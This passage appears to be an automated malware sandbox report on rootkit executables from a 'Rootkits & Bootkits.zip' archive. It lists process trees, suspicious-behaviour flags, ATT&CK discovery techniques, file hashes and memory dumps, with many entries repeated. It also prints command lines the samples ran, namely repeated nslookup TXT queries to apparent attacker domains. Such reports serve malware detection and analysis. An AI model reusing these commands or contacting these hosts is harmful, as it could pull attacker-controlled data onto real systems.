- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2200

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.114
2⤵
PID:4756

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:4376

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.114
2⤵
PID:3976

C:\Users\Admin\Desktop\Rootkits\cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
"C:\Users\Admin\Desktop\Rootkits\cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4676

C:\Users\Admin\Desktop\Rootkits\b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe
"C:\Users\Admin\Desktop\Rootkits\b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
- Modifies data under HKEY_USERS
PID:4232

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Rootkits & Bootkits.zip"
1⤵
PID:2140

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2752

C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
"C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe"
1⤵
- Enumerates connected drives
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3208

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.114
2⤵
PID:2000

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:3024

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.114
2⤵
PID:4912

C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
"C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe"
1⤵
- Enumerates connected drives
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.114
2⤵
PID:4140

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:3380

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.114
2⤵
PID:1364

C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
"C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe"
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:3188

C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
"C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:1816

C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
"C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe"
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:232

C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
"C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe"
1⤵
- Enumerates connected drives
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2200

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.114
2⤵
PID:4756

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:4376

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.114
2⤵
PID:3976

C:\Users\Admin\Desktop\Rootkits\cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
"C:\Users\Admin\Desktop\Rootkits\cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4676

C:\Users\Admin\Desktop\Rootkits\b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe
"C:\Users\Admin\Desktop\Rootkits\b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
- Modifies data under HKEY_USERS
PID:4232

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4Xkvo0.sys
Filesize
501KB

MD5
034bb3d89e550122860a8f6e1986b499

SHA1
101a2272f936f6ca969c3414b1c2758f3b5f02d0

SHA256
4391e4b30dd1b3b8e4a9d209d6e3f3187bbdbfef3effc61e5e9edf5f1501e726

SHA512
b583215e878565f6b36473678d891f9761fe8cf652153abc760be7bf14f148e7ec6ac0033794ecca030e539b68a483dde457e32aba252bfa16246ab0ef89f446

Download Submit
C:\Users\Admin\AppData\Local\Temp\4Xkvo0.sys
Filesize
501KB

MD5
034bb3d89e550122860a8f6e1986b499

SHA1
101a2272f936f6ca969c3414b1c2758f3b5f02d0

SHA256
4391e4b30dd1b3b8e4a9d209d6e3f3187bbdbfef3effc61e5e9edf5f1501e726

SHA512
b583215e878565f6b36473678d891f9761fe8cf652153abc760be7bf14f148e7ec6ac0033794ecca030e539b68a483dde457e32aba252bfa16246ab0ef89f446

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rootkits & Bootkits.zip
Filesize
99.1MB

MD5
daa4a303815b2f4b3383ae4e9cb9d70b

SHA1
71ad3c455f33dff881e05816d87f43e48b6a5084

SHA256
94e3a8f25dbff86ee6fe11ee045b70055357c08ae1723598a361c96eac5e2c24

SHA512
7c2fd76a9fc12382df8abb3ad459dc962ffe07ff03fd4801eb6a68e0802df9b5a1136fec3d421ffcfb387033ea9de3d302a878f1a901257be03f6271574557fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rootkits & Bootkits.zip
Filesize
99.1MB

MD5
daa4a303815b2f4b3383ae4e9cb9d70b

SHA1
71ad3c455f33dff881e05816d87f43e48b6a5084

SHA256
94e3a8f25dbff86ee6fe11ee045b70055357c08ae1723598a361c96eac5e2c24

SHA512
7c2fd76a9fc12382df8abb3ad459dc962ffe07ff03fd4801eb6a68e0802df9b5a1136fec3d421ffcfb387033ea9de3d302a878f1a901257be03f6271574557fa

Download Submit
C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Filesize
9.9MB

MD5
b24dc6c074aab9d99b73958f2e503e1d

SHA1
c8cd87746bcaa193268bbb5a47f40148a5a12ad0

SHA256
0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510

SHA512
6ac7b1c0f1a70694ecb7abe4188f6d1826f6a9c9f35d107807c35e407bed9193f7aef8efd99579f3d6ad7163d9d7d45a0cef2b50d090172758e24728ce48d781

Download Submit
C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Filesize
9.9MB

MD5
b24dc6c074aab9d99b73958f2e503e1d

SHA1
c8cd87746bcaa193268bbb5a47f40148a5a12ad0

SHA256
0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510

SHA512
6ac7b1c0f1a70694ecb7abe4188f6d1826f6a9c9f35d107807c35e407bed9193f7aef8efd99579f3d6ad7163d9d7d45a0cef2b50d090172758e24728ce48d781

Download Submit
C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Filesize
9.3MB

MD5
ecc1f53b3c3aedb0b1cb703d7974ef26

SHA1
fffb993e86aa3d2b851aba1a9c50183cf186f866

SHA256
40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b

SHA512
2ff1dd30a72ce61ab7f87044e2f5adfac58c421f690b83bb8e31ecaf5f80aad5192a1b6b156adb0e025853b2c2f9a9fdd3801fb9af41f102f5f627b55e8339fd

Download Submit
C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Filesize
9.3MB

MD5
ecc1f53b3c3aedb0b1cb703d7974ef26

SHA1
fffb993e86aa3d2b851aba1a9c50183cf186f866

SHA256
40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b

SHA512
2ff1dd30a72ce61ab7f87044e2f5adfac58c421f690b83bb8e31ecaf5f80aad5192a1b6b156adb0e025853b2c2f9a9fdd3801fb9af41f102f5f627b55e8339fd

Download Submit
C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Filesize
9.5MB

MD5
d76e73e0235f77c9bf5578eb51a9bf9a

SHA1
23f26097829f9591164c509831b627964ffdecf9

SHA256
757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8

SHA512
a41f9f136fec5842aeeb3ad87ad6874a708c374bb6680ce7a5cbd4539e262e9096825c8246b0cc5c280358e2f51c5ed5fa67050b33b67bb3e2349db3fae6db18

Download Submit
C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Filesize
9.5MB

MD5
d76e73e0235f77c9bf5578eb51a9bf9a

SHA1
23f26097829f9591164c509831b627964ffdecf9

SHA256
757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8

SHA512
a41f9f136fec5842aeeb3ad87ad6874a708c374bb6680ce7a5cbd4539e262e9096825c8246b0cc5c280358e2f51c5ed5fa67050b33b67bb3e2349db3fae6db18

Download Submit
C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Filesize
10.0MB

MD5
f338e08dae3effcca7d84a84cbc36732

SHA1
13291f3b1db6555ab3f4e7ac927accbd021822c8

SHA256
bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102

SHA512
51fd786a839000b43c6534e00a38248bdd05fcc311302006978b62a370b382271146a0cf93e68d1993a10ee4ec283a689321270226ee53c4a2620eca1c4563b7

Download Submit
C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Filesize
10.0MB

MD5
f338e08dae3effcca7d84a84cbc36732

SHA1
13291f3b1db6555ab3f4e7ac927accbd021822c8

SHA256
bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102

SHA512
51fd786a839000b43c6534e00a38248bdd05fcc311302006978b62a370b382271146a0cf93e68d1993a10ee4ec283a689321270226ee53c4a2620eca1c4563b7

Download Submit
C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Filesize
11.1MB

MD5
b27ef596ee23e06c664222240ac52ffc

SHA1
9c9cba52afa1f725dea838869e0d651938e2895f

SHA256
cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b

SHA512
1fd04ec52423603af47cfe38698827fec0e499cf30c1f3f4f33b4940a9c028bc7de5488f6f501a367b05271c2256f27a92dff660e93318aa206eec72e916bbf1

Download Submit
C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Filesize
11.1MB

MD5
b27ef596ee23e06c664222240ac52ffc

SHA1
9c9cba52afa1f725dea838869e0d651938e2895f

SHA256
cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b

SHA512
1fd04ec52423603af47cfe38698827fec0e499cf30c1f3f4f33b4940a9c028bc7de5488f6f501a367b05271c2256f27a92dff660e93318aa206eec72e916bbf1

Download Submit
C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Filesize
9.7MB

MD5
f2a174aa0dc315551a1b25c1ed6e18db

SHA1
47b5cd7f07adcbb8c09a819f83656ca60b5f36ed

SHA256
cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196

SHA512
73c155669a18fb491b36b105cc0c7072f2ce8db26fd371654e70ed50b8b44bdbb8ad36d857849cf57347ccbbe78c740f3c0fb53b4f0aba028a70623707b6976e

Download Submit
C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Filesize
9.7MB

MD5
f2a174aa0dc315551a1b25c1ed6e18db

SHA1
47b5cd7f07adcbb8c09a819f83656ca60b5f36ed

SHA256
cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196

SHA512
73c155669a18fb491b36b105cc0c7072f2ce8db26fd371654e70ed50b8b44bdbb8ad36d857849cf57347ccbbe78c740f3c0fb53b4f0aba028a70623707b6976e

Download Submit
memory/1104-13-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-64-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-73-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-3-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-19-0x00000000032F0000-0x00000000032F1000-memory.dmp

Filesize
4KB

Download
memory/1104-14-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-13-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-3-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-19-0x00000000032F0000-0x00000000032F1000-memory.dmp

Filesize
4KB

Download
memory/1104-14-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-73-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1104-64-0x0000000000400000-0x000000000151B000-memory.dmp

Filesize
17.1MB

Download
memory/1676-69-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/1676-35-0x0000000007A40000-0x0000000007B6C000-memory.dmp

Filesize
1.2MB

Download
memory/1676-69-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/1676-63-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/1676-35-0x0000000007A40000-0x0000000007B6C000-memory.dmp

Filesize
1.2MB

Download
memory/1676-65-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/1676-55-0x0000000007A40000-0x0000000007B6C000-memory.dmp

Filesize
1.2MB

Download
memory/1676-1-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/1676-68-0x0000000007A40000-0x0000000007B6C000-memory.dmp

Filesize
1.2MB

Download
memory/1676-63-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/1676-20-0x00000000031E0000-0x00000000031E1000-memory.dmp

Filesize
4KB

Download
memory/1676-65-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/1676-68-0x0000000007A40000-0x0000000007B6C000-memory.dmp

Filesize
1.2MB

Download
memory/1676-20-0x00000000031E0000-0x00000000031E1000-memory.dmp

Filesize
4KB

Download
memory/1676-55-0x0000000007A40000-0x0000000007B6C000-memory.dmp

Filesize
1.2MB

Download
memory/1676-1-0x0000000000400000-0x0000000001580000-memory.dmp

Filesize
17.5MB

Download
memory/2200-72-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2200-71-0x0000000007EF0000-0x000000000801C000-memory.dmp

Filesize
1.2MB

Download
memory/2200-4-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2200-52-0x0000000007EF0000-0x000000000801C000-memory.dmp

Filesize
1.2MB

Download
memory/2200-72-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2200-15-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2200-66-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2200-31-0x0000000007EF0000-0x000000000801C000-memory.dmp

Filesize
1.2MB

Download
memory/2200-15-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2200-23-0x00000000016F0000-0x00000000016F1000-memory.dmp

Filesize
4KB

Download
memory/2200-52-0x0000000007EF0000-0x000000000801C000-memory.dmp

Filesize
1.2MB

Download
memory/2200-66-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2200-23-0x00000000016F0000-0x00000000016F1000-memory.dmp

Filesize
4KB

Download
memory/2200-71-0x0000000007EF0000-0x000000000801C000-memory.dmp

Filesize
1.2MB

Download
memory/2200-31-0x0000000007EF0000-0x000000000801C000-memory.dmp

Filesize
1.2MB

Download
memory/2200-4-0x0000000000400000-0x000000000157F000-memory.dmp

Filesize
17.5MB

Download
memory/2336-67-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-18-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-27-0x00000000017C0000-0x00000000017C1000-memory.dmp

Filesize
4KB

Download
memory/2336-26-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-70-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-27-0x00000000017C0000-0x00000000017C1000-memory.dmp

Filesize
4KB

Download
memory/2336-11-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-11-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-26-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-70-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-18-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/2336-67-0x0000000000400000-0x0000000001519000-memory.dmp

Filesize
17.1MB

Download
memory/3208-61-0x0000000000400000-0x0000000001585000-memory.dmp

Filesize
17.5MB

Download
memory/3208-2-0x0000000000400000-0x0000000001585000-memory.dmp

Filesize
17.5MB

Download
memory/3208-22-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/3208-24-0x0000000000400000-0x0000000001585000-memory.dmp

Filesize
17.5MB

Download
memory/3208-22-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/3208-2-0x0000000000400000-0x0000000001585000-memory.dmp

Filesize
17.5MB

Download
memory/3208-24-0x0000000000400000-0x0000000001585000-memory.dmp

Filesize
17.5MB

Download
memory/3208-46-0x00000000083F0000-0x000000000851C000-memory.dmp

Filesize
1.2MB

Download
memory/3208-59-0x00000000083F0000-0x000000000851C000-memory.dmp

Filesize
1.2MB

Download
memory/3208-60-0x00000000083F0000-0x000000000851C000-memory.dmp

Filesize
1.2MB

Download
memory/3208-61-0x0000000000400000-0x0000000001585000-memory.dmp

Filesize
17.5MB

Download
memory/3208-60-0x00000000083F0000-0x000000000851C000-memory.dmp

Filesize
1.2MB

Download
memory/3208-46-0x00000000083F0000-0x000000000851C000-memory.dmp

Filesize
1.2MB

Download
memory/3208-59-0x00000000083F0000-0x000000000851C000-memory.dmp

Filesize
1.2MB

Download
memory/3904-62-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/3904-6-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/3904-17-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/3904-16-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/3904-62-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/3904-17-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/3904-21-0x0000000003090000-0x0000000003091000-memory.dmp

Filesize
4KB

Download
memory/3904-21-0x0000000003090000-0x0000000003091000-memory.dmp

Filesize
4KB

Download
memory/3904-16-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/3904-6-0x0000000000400000-0x000000000151E000-memory.dmp

Filesize
17.1MB

Download
memory/4676-83-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-99-0x00007FFF3C810000-0x00007FFF3D2D1000-memory.dmp

Filesize
10.8MB

Download
memory/4676-102-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-106-0x00007FFF3C810000-0x00007FFF3D2D1000-memory.dmp

Filesize
10.8MB

Download
memory/4676-81-0x00007FFF3C810000-0x00007FFF3D2D1000-memory.dmp

Filesize
10.8MB

Download
memory/4676-95-0x000001A304CF0000-0x000001A304DF0000-memory.dmp

Filesize
1024KB

Download
memory/4676-82-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-84-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-85-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-101-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-100-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-80-0x000001A366620000-0x000001A36665E000-memory.dmp

Filesize
248KB

Download
memory/4676-80-0x000001A366620000-0x000001A36665E000-memory.dmp

Filesize
248KB

Download
memory/4676-81-0x00007FFF3C810000-0x00007FFF3D2D1000-memory.dmp

Filesize
10.8MB

Download
memory/4676-83-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-82-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-84-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-85-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-95-0x000001A304CF0000-0x000001A304DF0000-memory.dmp

Filesize
1024KB

Download
memory/4676-99-0x00007FFF3C810000-0x00007FFF3D2D1000-memory.dmp

Filesize
10.8MB

Download
memory/4676-100-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-101-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-102-0x000001A37F1C0000-0x000001A37F1D0000-memory.dmp

Filesize
64KB

Download
memory/4676-106-0x00007FFF3C810000-0x00007FFF3D2D1000-memory.dmp

Filesize
10.8MB

Download